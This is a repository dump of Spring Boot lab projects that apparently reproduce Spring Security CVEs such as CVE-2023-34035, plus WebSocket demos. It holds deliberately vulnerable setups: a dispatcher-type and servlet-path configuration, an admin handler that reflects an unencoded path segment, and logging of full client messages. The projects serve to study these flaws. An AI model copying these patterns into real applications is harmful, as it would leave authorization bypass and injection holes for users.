-------------------------------------------------------------------------------- 1 | server.port=8085 2 | spring.security.filter.dispatcher-types = request, error, async, forward, include 3 | -------------------------------------------------------------------------------- /CVE-2022-31692/target/classes/com/example/demo/Config/AuthConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/classes/com/example/demo/Config/AuthConfig.class -------------------------------------------------------------------------------- /CVE-2022-31692/target/classes/com/example/demo/Controller/AuthController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/classes/com/example/demo/Controller/AuthController.class -------------------------------------------------------------------------------- /CVE-2022-31692/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2022-31692/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2022-31692/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2023-20860/HELP.md: 
-------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image) 9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security) 10 | 11 | ### Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/) 15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/) 16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/) 17 | 18 | -------------------------------------------------------------------------------- /CVE-2023-20860/src/main/java/com/example/demo/Controller/AuthController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo.Controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | import org.springframework.web.bind.annotation.PathVariable; 6 | import org.springframework.web.bind.annotation.ResponseBody; 7 | 8 | @Controller 9 | /** Lab controller for the CVE-2023-20860 sample project with three GET handlers, all of which write their return value as the response body. No access rule is declared here. NOTE(review): any protection of the admin path presumably comes from Config/AuthConfig, whose source is not shown on this page, so the request matcher pattern used there has to be checked against every path these mappings accept. */ public class AuthController { 10 | @GetMapping("/") 11 | @ResponseBody 12 | public String index() { 13 | return "welcome"; 14 | } 15 | 16 | /** Returns the text welcome followed by the name path segment, copied into the response body without encoding. NOTE(review): the segment is chosen by the caller and the response content type is negotiated rather than fixed by this mapping, so if a browser renders the reply as HTML any markup in the segment is reflected as is. Encode the value for the output context, or pin the mapping to text/plain with the produces attribute, before copying this handler out of the lab. */ @GetMapping("/admin/{name}") 17 | @ResponseBody 18 | public String admin(@PathVariable String name) { 19 | return "welcome " + name; 20 | } 21 | 22 | 23 | @GetMapping("/data") 24 | @ResponseBody 25 | public String data() { 26 | return "get data"; 27 | } 28 | } 29 |
-------------------------------------------------------------------------------- /CVE-2023-20860/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2023-20860/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | -------------------------------------------------------------------------------- /CVE-2023-20860/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2023-20860/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | -------------------------------------------------------------------------------- /CVE-2023-20860/target/classes/com/example/demo/Config/AuthConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/classes/com/example/demo/Config/AuthConfig.class 
-------------------------------------------------------------------------------- /CVE-2023-20860/target/classes/com/example/demo/Controller/AuthController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/classes/com/example/demo/Controller/AuthController.class -------------------------------------------------------------------------------- /CVE-2023-20860/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2023-20860/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-20860/target/test-classes/com/example/demo/DemoApplicationTests.class -------------------------------------------------------------------------------- /CVE-2023-34034/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image) 9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security) 10 | 11 | ### 
Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/) 15 | * [Spring Boot and OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/) 16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/) 17 | 18 | -------------------------------------------------------------------------------- /CVE-2023-34034/src/main/java/com/example/demo/Controller/AdminController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo.Controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.*; 5 | import reactor.core.publisher.Mono; 6 | 7 | @RestController 8 | @RequestMapping("/admin") 9 | public class AdminController { 10 | 11 | @GetMapping("/get") 12 | public Mono getPublicResource() { 13 | return Mono.just("hello admin!"); 14 | } 15 | } 16 | -------------------------------------------------------------------------------- /CVE-2023-34034/src/main/java/com/example/demo/Controller/PublicController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo.Controller; 2 | 3 | import org.springframework.web.bind.annotation.GetMapping; 4 | import org.springframework.web.bind.annotation.RequestMapping; 5 | import org.springframework.web.bind.annotation.RestController; 6 | import reactor.core.publisher.Mono; 7 | 8 | @RestController 9 | @RequestMapping("/public") 10 | public class PublicController { 11 | 12 | @GetMapping("/get") 13 | public Mono getPublicResource() { 14 | return Mono.just("hello!"); 15 | } 16 | 17 | } 18 | -------------------------------------------------------------------------------- /CVE-2023-34034/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package 
com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2023-34034/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | -------------------------------------------------------------------------------- /CVE-2023-34034/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2023-34034/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | -------------------------------------------------------------------------------- /CVE-2023-34034/target/classes/com/example/demo/Config/AuthConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/Config/AuthConfig.class -------------------------------------------------------------------------------- /CVE-2023-34034/target/classes/com/example/demo/Controller/AdminController.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/Controller/AdminController.class -------------------------------------------------------------------------------- /CVE-2023-34034/target/classes/com/example/demo/Controller/PublicController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/Controller/PublicController.class -------------------------------------------------------------------------------- /CVE-2023-34034/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34034/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2023-34035/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.4/maven-plugin/reference/html/#build-image) 9 | * [Spring Security](https://docs.spring.io/spring-boot/docs/2.7.4/reference/htmlsingle/#web.security) 10 | 11 | ### Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Securing a Web Application](https://spring.io/guides/gs/securing-web/) 15 | * [Spring Boot and 
OAuth2](https://spring.io/guides/tutorials/spring-boot-oauth2/) 16 | * [Authenticating a User with LDAP](https://spring.io/guides/gs/authenticating-ldap/) 17 | 18 | -------------------------------------------------------------------------------- /CVE-2023-34035/demo.iml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /CVE-2023-34035/src/main/java/com/example/demo/Controller/AuthController.java: -------------------------------------------------------------------------------- 1 | package com.example.demo.Controller; 2 | 3 | import org.springframework.stereotype.Controller; 4 | import org.springframework.web.bind.annotation.GetMapping; 5 | import org.springframework.web.bind.annotation.PathVariable; 6 | import org.springframework.web.bind.annotation.ResponseBody; 7 | 8 | @Controller 9 | public class AuthController { 10 | @GetMapping 11 | @ResponseBody 12 | public String index() { 13 | return "welcome"; 14 | } 15 | 16 | @GetMapping("/admin/{name}") 17 | @ResponseBody 18 | public String admin(@PathVariable String name) { 19 | return "welcome " + name; 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /CVE-2023-34035/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class DemoApplication { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(DemoApplication.class, args); 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- 
/CVE-2023-34035/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | spring.mvc.servlet.path=/mvc 3 | server.servlet.register-default-servlet=true 4 | -------------------------------------------------------------------------------- /CVE-2023-34035/src/test/java/com/example/demo/DemoApplicationTests.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.junit.jupiter.api.Test; 4 | import org.springframework.boot.test.context.SpringBootTest; 5 | 6 | @SpringBootTest 7 | class DemoApplicationTests { 8 | 9 | @Test 10 | void contextLoads() { 11 | } 12 | 13 | } 14 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8085 2 | spring.mvc.servlet.path=/mvc 3 | server.servlet.register-default-servlet=true 4 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/classes/com/example/demo/Config/AuthConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/classes/com/example/demo/Config/AuthConfig.class -------------------------------------------------------------------------------- /CVE-2023-34035/target/classes/com/example/demo/Controller/AuthController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/classes/com/example/demo/Controller/AuthController.class -------------------------------------------------------------------------------- 
/CVE-2023-34035/target/classes/com/example/demo/DemoApplication.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/classes/com/example/demo/DemoApplication.class -------------------------------------------------------------------------------- /CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar -------------------------------------------------------------------------------- /CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar.original: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/demo-0.0.1-SNAPSHOT.jar.original -------------------------------------------------------------------------------- /CVE-2023-34035/target/maven-archiver/pom.properties: -------------------------------------------------------------------------------- 1 | artifactId=demo 2 | groupId=com.example 3 | version=0.0.1-SNAPSHOT 4 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | com/example/demo/DemoApplication.class 2 | com/example/demo/Config/AuthConfig.class 3 | com/example/demo/Controller/AuthController.class 4 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst: -------------------------------------------------------------------------------- 1 
| /Users/dxy/Downloads/CVE-2023-34035/src/main/java/com/example/demo/Config/AuthConfig.java 2 | /Users/dxy/Downloads/CVE-2023-34035/src/main/java/com/example/demo/Controller/AuthController.java 3 | /Users/dxy/Downloads/CVE-2023-34035/src/main/java/com/example/demo/DemoApplication.java 4 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/createdFiles.lst: -------------------------------------------------------------------------------- 1 | com/example/demo/DemoApplicationTests.class 2 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/maven-status/maven-compiler-plugin/testCompile/default-testCompile/inputFiles.lst: -------------------------------------------------------------------------------- 1 | /Users/dxy/Downloads/CVE-2023-34035/src/test/java/com/example/demo/DemoApplicationTests.java 2 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/surefire-reports/com.example.demo.DemoApplicationTests.txt: -------------------------------------------------------------------------------- 1 | ------------------------------------------------------------------------------- 2 | Test set: com.example.demo.DemoApplicationTests 3 | ------------------------------------------------------------------------------- 4 | Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1.984 s - in com.example.demo.DemoApplicationTests 5 | -------------------------------------------------------------------------------- /CVE-2023-34035/target/test-classes/com/example/demo/DemoApplicationTests.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/CVE-2023-34035/target/test-classes/com/example/demo/DemoApplicationTests.class 
-------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/README.md: -------------------------------------------------------------------------------- 1 | ## Srping boot Websocket 集成 2 | 3 | 技术单: 4 | 5 | - Spring boot 和 STOMP 6 | - Spring security 7 | - Why we using websocket 8 | - High frequency 9 | - Low latency 10 | 11 | 12 | ## 参考资料 13 | 14 | - http://www.devglan.com/spring-boot/spring-boot-websocket-integration-example 15 | - http://tech.lede.com/2017/03/08/qa/websocket+spring/ 16 | - http://blog.csdn.net/elonpage/article/details/78446695?locationNum=5&fps=1 17 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/Application.java: -------------------------------------------------------------------------------- 1 | package com.devglan; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | @SpringBootApplication 7 | public class Application { 8 | 9 | public static void main(String[] args) { 10 | SpringApplication.run(Application.class, args); 11 | 12 | } 13 | } 14 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/interceptor/SendMessageChannelInterceptor.java: -------------------------------------------------------------------------------- 1 | package com.devglan.interceptor; 2 | 3 | import org.slf4j.Logger; 4 | import org.slf4j.LoggerFactory; 5 | import org.springframework.messaging.Message; 6 | import org.springframework.messaging.MessageChannel; 7 | import org.springframework.messaging.support.ChannelInterceptorAdapter; 8 | import org.springframework.stereotype.Component; 9 | 10 | @Component 11 | public class SendMessageChannelInterceptor extends ChannelInterceptorAdapter { 12 | 13 | private static final Logger logger = 
LoggerFactory.getLogger(SendMessageChannelInterceptor.class); 14 | 15 | /** Writes every message that passes through the channel this interceptor is registered on to the INFO log, then delegates to the superclass implementation and returns its result. NOTE(review): the {} argument is rendered with the toString() of the message, which presumably includes headers and payload, so application data and any credential a client puts in a header would be copied into the log. Prefer logging a session id and destination only, at DEBUG. */ @Override 16 | public Message preSend(Message message, MessageChannel channel) { 17 | logger.info("Send message: {}", message); 18 | return super.preSend(message, channel); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/websocket/event/StompConnectEventListener.java: -------------------------------------------------------------------------------- 1 | package com.devglan.websocket.event; 2 | 3 | import org.slf4j.Logger; 4 | import org.slf4j.LoggerFactory; 5 | import org.springframework.context.ApplicationListener; 6 | import org.springframework.messaging.simp.stomp.StompHeaderAccessor; 7 | import org.springframework.stereotype.Component; 8 | import org.springframework.web.socket.messaging.SessionConnectEvent; 9 | 10 | @Component 11 | public class StompConnectEventListener implements ApplicationListener { 12 | private static final Logger logger = LoggerFactory.getLogger(StompConnectEventListener.class); 13 | 14 | /** Logs one INFO line per SessionConnectEvent, using the value returned by getHost() on the wrapped message headers. NOTE(review): StompHeaderAccessor.getHost() reads the host header of the STOMP CONNECT frame, a value chosen by the connecting client (the virtual host it asks for), not the network address of the peer. The log text reads as if it identified the client, so do not rely on this line for attribution; take the remote address from the handshake or the proxy log instead. */ @Override 15 | public void onApplicationEvent(SessionConnectEvent event) { 16 | StompHeaderAccessor accessor = StompHeaderAccessor.wrap(event.getMessage()); 17 | logger.info("Accept connection request from client: {}", accessor.getHost()); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/websocket/event/StompConnectedEventListener.java: -------------------------------------------------------------------------------- 1 | package com.devglan.websocket.event; 2 | 3 | import org.slf4j.Logger; 4 | import org.slf4j.LoggerFactory; 5 | import org.springframework.context.ApplicationListener; 6 | import org.springframework.messaging.simp.stomp.StompHeaderAccessor; 7 | import org.springframework.stereotype.Component; 8 | import
org.springframework.web.socket.messaging.SessionConnectedEvent; 9 | 10 | /** Listener that logs the user attached to each SessionConnectedEvent. */ @Component 11 | public class StompConnectedEventListener implements ApplicationListener { 12 | private static final Logger logger = LoggerFactory.getLogger(StompConnectedEventListener.class); 13 | 14 | /** Wraps the event's message in a StompHeaderAccessor and logs the value of getUser() at INFO. NOTE(review): presumably null when the handshake carried no authenticated principal; confirm how authentication is wired for this endpoint. */ @Override 15 | public void onApplicationEvent(SessionConnectedEvent event) { 16 | StompHeaderAccessor accessor = StompHeaderAccessor.wrap(event.getMessage()); 17 | logger.info("Connection build successfully: {}", accessor.getUser()); 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/java/com/devglan/websocket/event/StompSubscribeEventListener.java: -------------------------------------------------------------------------------- 1 | package com.devglan.websocket.event; 2 | 3 | import org.slf4j.Logger; 4 | import org.slf4j.LoggerFactory; 5 | import org.springframework.context.ApplicationListener; 6 | import org.springframework.messaging.simp.stomp.StompHeaderAccessor; 7 | import org.springframework.stereotype.Component; 8 | import org.springframework.web.socket.messaging.SessionSubscribeEvent; 9 | 10 | /** Listener that logs the headers of each SessionSubscribeEvent. */ @Component 11 | public class StompSubscribeEventListener implements ApplicationListener { 12 | 13 | private static final Logger logger = LoggerFactory.getLogger(StompSubscribeEventListener.class); 14 | 15 | /** Wraps the event's message in a StompHeaderAccessor and logs the accessor's string form at INFO. */ @Override 16 | public void onApplicationEvent(SessionSubscribeEvent sessionSubscribeEvent) { 17 | StompHeaderAccessor headerAccessor = StompHeaderAccessor.wrap(sessionSubscribeEvent.getMessage()); 18 | /* NOTE(review): the header values come from the client and are used here as the log message itself; logging chosen fields such as getDestination() and getSessionId() as arguments keeps client text out of the message pattern and makes it easier to neutralise line breaks. */ logger.info(headerAccessor.toString()); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/resources/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8089 2 | server.address=10.128.5.250 3 |
-------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/src/main/resources/static/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #f5f5f5; 3 | } 4 | 5 | #main-content { 6 | max-width: 940px; 7 | padding: 2em 3em; 8 | margin: 0 auto 20px; 9 | background-color: #fff; 10 | border: 1px solid #e5e5e5; 11 | -webkit-border-radius: 5px; 12 | -moz-border-radius: 5px; 13 | border-radius: 5px; 14 | } -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/application.properties: -------------------------------------------------------------------------------- 1 | server.port=8089 2 | server.address=10.128.5.250 3 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/Application.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/Application.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$1.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$1.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$2.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig$2.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/config/WebSocketConfig.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/controller/WebSocketController.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/controller/WebSocketController.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/ReceiveMessageChannelInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/ReceiveMessageChannelInterceptor.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/SendMessageChannelInterceptor.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/SendMessageChannelInterceptor.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/WebSocketHandshakeInterceptor.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/interceptor/WebSocketHandshakeInterceptor.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectEventListener.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectEventListener.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectedEventListener.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompConnectedEventListener.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompSubscribeEventListener.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ax1sX/SpringSecurity/485c8cd02a6b55df3294006c67ffe3d86ef1793a/Projects/Spring-WebSocket-with-STOMP/target/classes/com/devglan/websocket/event/StompSubscribeEventListener.class -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-with-STOMP/target/classes/static/main.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #f5f5f5; 3 | } 4 | 5 | #main-content { 6 | max-width: 940px; 7 | padding: 2em 3em; 8 | margin: 0 auto 20px; 9 | background-color: #fff; 10 | border: 1px solid #e5e5e5; 11 | -webkit-border-radius: 5px; 12 | -moz-border-radius: 5px; 13 | border-radius: 5px; 14 | } -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/HELP.md: -------------------------------------------------------------------------------- 1 | # Getting Started 2 | 3 | ### Reference Documentation 4 | For further reference, please consider the following sections: 5 | 6 | * [Official Apache Maven documentation](https://maven.apache.org/guides/index.html) 7 | * [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/) 8 | * [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.7.1/maven-plugin/reference/html/#build-image) 9 | * [WebSocket](https://docs.spring.io/spring-boot/docs/2.7.1/reference/htmlsingle/#messaging.websockets) 10 | 11 | ### Guides 12 | The following guides illustrate how to use some features concretely: 13 | 14 | * [Using WebSocket to build an interactive web application](https://spring.io/guides/gs/messaging-stomp-websocket/) 15 | 16 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/BinarySocketHandler.java: 
-------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.stereotype.Component; 4 | import org.springframework.web.socket.BinaryMessage; 5 | import org.springframework.web.socket.WebSocketSession; 6 | import org.springframework.web.socket.handler.BinaryWebSocketHandler; 7 | 8 | /** 9 | * Binary WebSocket handler. Replies to every binary message with the bytes of a fixed string and does not read the incoming payload. 10 | */ 11 | @Component 12 | public class BinarySocketHandler extends BinaryWebSocketHandler { 13 | @Override 14 | protected void handleBinaryMessage(WebSocketSession session, BinaryMessage message) throws Exception { 15 | /* getBytes() without a charset argument encodes with the platform default charset. */ session.sendMessage(new BinaryMessage("hello world!".getBytes())); 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /Projects/Spring-WebSocket-without-STOMP/src/main/java/com/example/demo/DemoApplication.java: -------------------------------------------------------------------------------- 1 | package com.example.demo; 2 | 3 | import org.springframework.boot.SpringApplication; 4 | import org.springframework.boot.autoconfigure.SpringBootApplication; 5 | 6 | /** Spring Boot entry point for the 